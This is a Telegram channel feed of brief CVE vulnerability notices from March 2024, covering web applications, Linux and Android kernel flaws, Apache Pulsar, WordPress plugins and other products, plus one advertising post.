🚨 CVE-2024-27744Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.🎖@cveNotify |
|
| 2024-03-13 07:37:38 |
🚨 CVE-2024-27743Cross Site Scripting vulnerability in Petrol Pump Mangement Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component.🎖@cveNotify |
|
| 2024-03-13 06:37:25 |
🚨 CVE-2024-27440The Toyoko Inn official App for iOS versions prior to 1.13.0 and Toyoko Inn official App for Android versions prior 1.3.14 don't properly verify server certificates, which allows a man-in-the-middle attacker to spoof servers and obtain sensitive information via a crafted certificate.🎖@cveNotify |
|
| 2024-03-13 06:31:31 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2024-03-13 04:38:04 |
🚨 CVE-2024-25386Directory Traversal vulnerability in DICOM® Connectivity Framework by laurelbridge before v.2.7.6b allows a remote attacker to execute arbitrary code via the format_logfile.pl file.🎖@cveNotify |
|
| 2024-03-13 03:37:42 |
🚨 CVE-2024-2413Intumit SmartRobot uses a fixed encryption key for authentication. Remote attackers can use this key to encrypt a string composed of the user's name and timestamp to generate an authentication code. With this authentication code, they can obtain administrator privileges and subsequently execute arbitrary code on the remote server using built-in system functionality.🎖@cveNotify |
|
| 2024-03-13 03:37:41 |
🚨 CVE-2024-26622In the Linux kernel, the following vulnerability has been resolved:tomoyo: fix UAF write bug in tomoyo_write_control()Since tomoyo_write_control() updates head->write_buf when write()of long lines is requested, we need to fetch head->write_buf afterhead->io_sem is held. Otherwise, concurrent write() requests cancause use-after-free-write and double-free problems.🎖@cveNotify |
|
| 2024-03-13 03:37:36 |
🚨 CVE-2024-23123A maliciously crafted CATPART file in CC5Dll.dll or ASMBASE228A.dll when parsed through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-03-13 03:37:35 |
🚨 CVE-2024-22099NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.This issue affects Linux kernel: v2.6.12-rc2.🎖@cveNotify |
|
| 2024-03-13 02:38:05 |
🚨 CVE-2023-45231EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.🎖@cveNotify |
|
| 2024-03-13 02:37:59 |
🚨 CVE-2023-45230EDK2's Network Package is susceptible to a buffer overflow vulnerability via a long server ID option in DHCPv6 client. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.🎖@cveNotify |
|
| 2024-03-13 02:37:58 |
🚨 CVE-2022-36763EDK2 is susceptible to a vulnerability in the Tcg2MeasureGptTable() function, allowing a user to trigger a heap buffer overflow via a local network. Successful exploitation of this vulnerability may result in a compromise of confidentiality, integrity, and/or availability.🎖@cveNotify |
|
| 2024-03-13 02:37:57 |
🚨 CVE-2023-4522An issue has been discovered in GitLab affecting all versions before 16.2.0. Committing directories containing LF character results in 500 errors when viewing the commit.🎖@cveNotify |
|
| 2024-03-12 23:37:25 |
🚨 CVE-2024-1421The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘border_type’ attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-12 23:37:24 |
🚨 CVE-2023-7072The Post Grid Combo – 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.68 via the 'get_posts' REST API Endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including full draft posts and password protected posts, as well as the password for password-protected posts.🎖@cveNotify |
|
| 2024-03-12 22:37:25 |
🚨 CVE-2024-24101Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Eligibility Information Update.🎖@cveNotify |
|
| 2024-03-12 22:37:24 |
🚨 CVE-2023-43279Null Pointer Dereference in mask_cidr6 component at cidr.c in Tcpreplay 4.4.4 allows attackers to crash the application via crafted tcprewrite command.🎖@cveNotify |
|
| 2024-03-12 21:37:44 |
🚨 CVE-2023-48407there is a possible DCK won't be deleted after factory reset due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 21:37:38 |
🚨 CVE-2023-48406there is a possible permanent DoS or way for the modem to boot unverified firmware due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 21:37:37 |
🚨 CVE-2023-48403In sms_DecodeCodedTpMsg of sms_PduCodec.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure if the attacker is able to observe the behavior of the subsequent switch conditional with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 21:37:36 |
🚨 CVE-2023-48402In ppcfw_enable of ppcfw.c, there is a possible EoP due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 21:37:32 |
🚨 CVE-2023-48398In ProtocolNetAcBarringInfo::ProtocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 21:37:31 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.🎖@cveNotify |
|
| 2024-03-12 20:37:29 |
🚨 CVE-2024-0044In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 19:37:26 |
🚨 CVE-2024-28098The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role.This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6.2.11 Apache Pulsar users should upgrade to at least 2.11.4.3.0 Apache Pulsar users should upgrade to at least 3.0.3.3.1 Apache Pulsar users should upgrade to at least 3.1.3.3.2 Apache Pulsar users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.🎖@cveNotify |
|
| 2024-03-12 19:37:25 |
🚨 CVE-2024-27135Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true".This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6.2.11 Pulsar Function Worker users should upgrade to at least 2.11.4.3.0 Pulsar Function Worker users should upgrade to at least 3.0.3.3.1 Pulsar Function Worker users should upgrade to at least 3.1.3.3.2 Pulsar Function Worker users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.🎖@cveNotify |
|
| 2024-03-12 19:37:24 |
🚨 CVE-2022-34321Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication. The vulnerable endpoint exposes detailed statistics about live connections, along with the capability to modify the logging level of proxied connections without requiring proper authentication credentials.This issue affects Apache Pulsar versions from 2.6.0 to 2.10.5, from 2.11.0 to 2.11.2, from 3.0.0 to 3.0.1, and 3.1.0.The known risks include exposing sensitive information such as connected client IP and unauthorized logging level manipulation which could lead to a denial-of-service condition by significantly increasing the proxy's logging overhead. When deployed via the Apache Pulsar Helm chart within Kubernetes environments, the actual client IP might not be revealed through the load balancer's default behavior, which typically obscures the original source IP addresses when externalTrafficPolicy is being configured to "Cluster" by default. The /proxy-stats endpoint contains topic level statistics, however, in the default configuration, the topic level statistics aren't known to be exposed.2.10 Pulsar Proxy users should upgrade to at least 2.10.6.2.11 Pulsar Proxy users should upgrade to at least 2.11.3.3.0 Pulsar Proxy users should upgrade to at least 3.0.2.3.1 Pulsar Proxy users should upgrade to at least 3.1.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. Additionally, it's imperative to recognize that the Apache Pulsar Proxy is not intended for direct exposure to the internet. The architectural design of Pulsar Proxy assumes that it will operate within a secured network environment, safeguarded by appropriate perimeter defenses.🎖@cveNotify |
|
| 2024-03-12 18:37:32 |
🚨 CVE-2024-1138The FTL Server component of TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition contains a vulnerability that allows a low privileged attacker with network access to execute a privilege escalation on the affected ftlserver. Affected releases are TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition: versions 6.10.1 and below.🎖@cveNotify |
|
| 2024-03-12 18:37:31 |
🚨 CVE-2024-1137The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition: versions 4.4.0 through 4.9.0.🎖@cveNotify |
|
| 2024-03-12 18:07:54 |
🚨 CVE-2024-21407Windows Hyper-V Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-12 18:07:53 |
🚨 CVE-2024-21392.NET and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-03-12 18:07:52 |
🚨 CVE-2024-21390Microsoft Authenticator Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-12 18:07:49 |
🚨 CVE-2024-21334Open Management Infrastructure (OMI) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-12 18:07:48 |
🚨 CVE-2024-27758In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.🎖@cveNotify |
|
| 2024-03-12 18:07:47 |
🚨 CVE-2024-1529Vulnerability in CMS Made Simple 2.2.14, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/adduser.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially take over their browser session.🎖@cveNotify |
|
| 2024-03-12 18:07:43 |
🚨 CVE-2024-1527Unrestricted file upload vulnerability in CMS Made Simple, affecting version 2.2.14. This vulnerability allows an authenticated user to bypass the security measures of the upload functionality and potentially create a remote execution of commands via webshell.🎖@cveNotify |
|
| 2024-03-12 18:07:42 |
🚨 CVE-2024-1302Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials.🎖@cveNotify |
|
| 2024-03-12 18:07:37 |
🚨 CVE-2024-1301SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.🎖@cveNotify |
|
| 2024-03-12 17:37:51 |
🚨 CVE-2024-21330Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-12 17:37:50 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-12 17:37:45 |
🚨 CVE-2023-42538An improper input validation in saped_rec_silence in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.🎖@cveNotify |
|
| 2024-03-12 17:37:44 |
🚨 CVE-2023-42531Improper access control vulnerability in SmsController prior to SMR Nov-2023 Release1 allows local attackers to bypass restrictions on starting activities from the background.🎖@cveNotify |
|
| 2024-03-12 17:37:39 |
🚨 CVE-2023-36911Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-12 17:37:38 |
🚨 CVE-2023-35385Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-12 17:37:34 |
🚨 CVE-2023-1416A vulnerability classified as critical has been found in Simple Art Gallery 1.0. Affected is an unknown function of the file adminHome.php. The manipulation of the argument social_facebook leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223128.🎖@cveNotify |
|
| 2024-03-12 17:37:33 |
🚨 CVE-2022-2564Prototype Pollution in GitHub repository automattic/mongoose prior to 6.4.6.🎖@cveNotify |
|
| 2024-03-12 17:37:32 |
🚨 CVE-2021-41583vpn-user-portal (aka eduVPN or Let's Connect!) before 2.3.14, as packaged for Debian 10, Debian 11, and Fedora, allows remote authenticated users to obtain OS filesystem access, because of the interaction of QR codes with an exec that uses the -r option. This can be leveraged to obtain additional VPN access.🎖@cveNotify |
|
| 2024-03-12 16:37:46 |
🚨 CVE-2024-1528CMS Made Simple version 2.2.14, does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/moduleinterface.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially hijack their browser session.🎖@cveNotify |
|
| 2024-03-12 16:37:41 |
🚨 CVE-2024-1304Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session.🎖@cveNotify |
|
| 2024-03-12 16:37:40 |
🚨 CVE-2024-1301SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.🎖@cveNotify |
|
| 2024-03-12 15:07:52 |
🚨 CVE-2024-22256VMware Cloud Director contains a partial information disclosure vulnerability. A malicious actor can potentially gather information about organization names based on the behavior of the instance.🎖@cveNotify |
|
| 2024-03-12 15:07:45 |
🚨 CVE-2024-24149A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.🎖@cveNotify |
|
| 2024-03-12 15:07:44 |
🚨 CVE-2024-24146A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file.🎖@cveNotify |
|
| 2024-03-12 15:07:40 |
🚨 CVE-2024-20941Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: HTML UI). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-03-12 15:07:39 |
🚨 CVE-2024-20735Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-12 15:07:35 |
🚨 CVE-2024-1530A vulnerability, which was classified as critical, has been found in ECshop 4.1.8. Affected by this issue is some unknown functionality of the file /admin/view_sendlist.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250562 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-12 15:07:34 |
🚨 CVE-2024-21349Microsoft ActiveX Data Objects Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-12 15:07:33 |
🚨 CVE-2022-22506IBM Robotic Process Automation 21.0.2 contains a vulnerability that could allow user ids may be exposed across tenants. IBM X-Force ID: 227293.🎖@cveNotify |
|
| 2024-03-12 13:08:16 |
🚨 CVE-2024-0052In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:15 |
🚨 CVE-2024-0050In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check. This could lead to a local non-security issue with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:11 |
🚨 CVE-2024-0048In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:10 |
🚨 CVE-2024-0046In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:09 |
🚨 CVE-2024-0045In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:06 |
🚨 CVE-2024-0044In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-12 13:08:05 |
🚨 CVE-2024-23611An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-03-12 13:08:04 |
🚨 CVE-2024-23610An out of bounds write due to a missing bounds check in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-03-12 13:08:01 |
🚨 CVE-2024-23609An improper error handling vulnerability in LabVIEW may result in remote code execution. Successful exploitation requires an attacker to provide a user with a specially crafted VI. This vulnerability affects LabVIEW 2024 Q1 and prior versions.🎖@cveNotify |
|
| 2024-03-12 13:08:00 |
🚨 CVE-2024-1441An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-03-12 13:07:59 |
🚨 CVE-2024-2370Unrestricted file upload vulnerability in ManageEngine Desktop Central affecting version 9, build 90055. This vulnerability could allow a remote attacker to upload a malicious file to the system without any credentials provided.🎖@cveNotify |
|
| 2024-03-12 10:37:51 |
🚨 CVE-2023-4729The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the publish_lp() function hooked via an AJAX action in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to change the LadiPage key (a key fully controlled by the attacker), enabling them to freely create new pages, including web pages that trigger stored XSS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-12 10:37:47 |
🚨 CVE-2023-4629The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to update the 'ladipage_config' option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-12 10:37:46 |
🚨 CVE-2023-4626The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and including, 4.3. This makes it possible for authenticated attackers with subscriber-level access and above to update the 'ladiflow_hook_configs' option.🎖@cveNotify |
|
| 2024-03-12 08:37:32 |
🚨 CVE-2024-27121Path traversal vulnerability exists in Machine Automation Controller NJ Series and Machine Automation Controller NX Series. An arbitrary file in the affected product may be accessed or arbitrary code may be executed by processing a specially crafted request sent from a remote attacker with an administrative privilege. As for the details of the affected product names/versions, see the information provided by the vendor under [References] section.🎖@cveNotify |
|
| 2024-03-12 08:37:26 |
🚨 CVE-2024-25325SQL injection vulnerability in Employee Management System v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to the txtemail parameter in the login.php.🎖@cveNotify |
|
| 2024-03-12 08:37:25 |
🚨 CVE-2024-21805Improper access control vulnerability exists in the specific folder of SKYSEA Client View versions from Ver.16.100 prior to Ver.19.2. If this vulnerability is exploited, an arbitrary file may be placed in the specific folder by a user who can log in to the PC where the product's Windows client is installed. In case the file is a specially crafted DLL file, arbitrary code may be executed with SYSTEM privilege.🎖@cveNotify |
|
| 2024-03-12 08:37:24 |
🚨 CVE-2023-49453Reflected cross-site scripting (XSS) vulnerability in Racktables v0.22.0 and before, allows local attackers to execute arbitrary code and obtain sensitive information via the search component in index.php.🎖@cveNotify |
|
| 2024-03-12 06:37:31 |
🚨 CVE-2024-25331DIR-822 Rev. B Firmware v2.02KRB09 and DIR-822-CA Rev. B Firmware v2.03WWb01 suffer from a LAN-Side Unauthenticated Remote Code Execution (RCE) vulnerability elevated from HNAP Stack-Based Buffer Overflow.🎖@cveNotify |
|
| 2024-03-12 05:37:25 |
🚨 CVE-2024-26483An arbitrary file upload vulnerability in the Profile Image module of Kirby CMS v4.1.0 allows attackers to execute arbitrary code via a crafted PDF file.🎖@cveNotify |
|
| 2024-03-12 05:37:24 |
🚨 CVE-2024-26481Kirby CMS v4.1.0 was discovered to contain a reflected self-XSS vulnerability via the URL parameter.🎖@cveNotify |
|
| 2024-03-12 04:37:42 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-03-12 04:37:41 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2024-03-12 03:37:32 |
🚨 CVE-2023-6536A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-03-12 03:37:25 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-03-12 03:37:24 |
🚨 CVE-2023-6606An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-03-12 01:37:37 |
🚨 CVE-2024-27902Applications based on SAP GUI for HTML in SAP NetWeaver AS ABAP - versions 7.89, 7.93, do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. A successful attack can allow a malicious attacker to access and modify data through their ability to execute code in a user’s browser. There is no impact on the availability of the system🎖@cveNotify |
|
| 2024-03-12 01:37:33 |
🚨 CVE-2024-27900Due to missing authorization check, attacker with business user account in SAP ABAP Platform - version 758, 795, can change the privacy setting of job templates from shared to private. As a result, the selected template would only be accessible to the owner.🎖@cveNotify |
|
| 2024-03-12 01:37:32 |
🚨 CVE-2024-22127SAP NetWeaver Administrator AS Java (Administrator Log Viewer plug-in) - version 7.50, allows an attacker with high privileges to upload potentially dangerous files which leads to command injection vulnerability. This would enable the attacker to run commands which can cause high impact on confidentiality, integrity and availability of the application.🎖@cveNotify |
|
| 2024-03-12 00:37:38 |
🚨 CVE-2023-49785NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2 and prior are vulnerable to server-side request forgery and cross-site scripting. This vulnerability enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies. As of time of publication, no patch is available, but other mitigation strategies are available. Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is an isolated network with no access to any other internal resources.🎖@cveNotify |
|
| 2024-03-11 22:37:32 |
🚨 CVE-2024-1645The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to export payment data collected by this plugin.🎖@cveNotify |
|
| 2024-03-11 22:37:26 |
🚨 CVE-2024-1400The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to duplicate arbitrary posts and pages.🎖@cveNotify |
|
| 2024-03-11 22:37:25 |
🚨 CVE-2024-25851Netis WF2780 v2.1.40144 was discovered to contain a command injection vulnerability via the config_sequence parameter in other_para of cgitest.cgi.🎖@cveNotify |
|
| 2024-03-11 22:37:24 |
🚨 CVE-2023-44253An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in Fortinet FortiManager version 7.4.0 through 7.4.1 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.1 and before 7.2.5 and FortiAnalyzer-BigData before 7.2.5 allows an adom administrator to enumerate other adoms and device names via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-03-11 20:37:30 |
🚨 CVE-2024-2357The Libreswan Project was notified of an issue causing libreswan to restart under some IKEv2 retransmit scenarios when a connection is configured to use PreSharedKeys (authby=secret) and the connection cannot find a matching configured secret. When such a connection is automatically added on startup using the auto= keyword, it can cause repeated crashes leading to a Denial of Service.🎖@cveNotify |
|
| 2024-03-11 20:37:29 |
🚨 CVE-2024-28198OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication. By manually manipulating http requests when using the draw.io integration it is possible to read arbitrary files as the configured system user and SSRF. The problem is fixed in version 18.1.6 and 18.2.2. It is advised to upgrade to the latest version of 18.1.x or 18.2.x. Users unable to upgrade may work around this issue by disabling the Draw.io module or the entire REST API which will secure the system.🎖@cveNotify |
|
| 2024-03-11 20:37:26 |
🚨 CVE-2024-28197Zitadel is an open source identity management system. Zitadel uses a cookie to identify the user agent (browser) and its user sessions. Although the cookie was handled according to best practices, it was accessible on subdomains of the ZITADEL instance. An attacker could take advantage of this and provide a malicious link hosted on the subdomain to the user to gain access to the victim’s account in certain scenarios. A possible victim would need to login through the malicious link for this exploit to work. If the possible victim already had the cookie present, the attack would not succeed. The attack would further only be possible if there was an initial vulnerability on the subdomain. This could either be the attacker being able to control DNS or a XSS vulnerability in an application hosted on a subdomain. Versions 2.46.0, 2.45.1, and 2.44.3 have been patched. Zitadel recommends upgrading to the latest versions available in due course. Note that applying the patch will invalidate the current cookie and thus users will need to start a new session and existing sessions (user selection) will be empty. For self-hosted environments unable to upgrade to a patched version, prevent setting the following cookie name on subdomains of your Zitadel instance (e.g. within your WAF): `__Secure-zitadel-useragent`.🎖@cveNotify |
|
| 2024-03-11 20:37:25 |
🚨 CVE-2024-27207Android kernel allows Elevation of privilege.🎖@cveNotify |
|
| 2024-03-11 20:37:24 |
🚨 CVE-2024-22006Android kernel allows Information disclosure.🎖@cveNotify |
|
| 2024-03-11 19:37:32 |
🚨 CVE-2024-22010In dvfs_plugin_caller of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 19:37:25 |
🚨 CVE-2024-22007In constraint_check of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 19:37:24 |
🚨 CVE-2024-22005In TBD of TBD, there is a possible Authentication Bypass due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-03-11 18:37:39 |
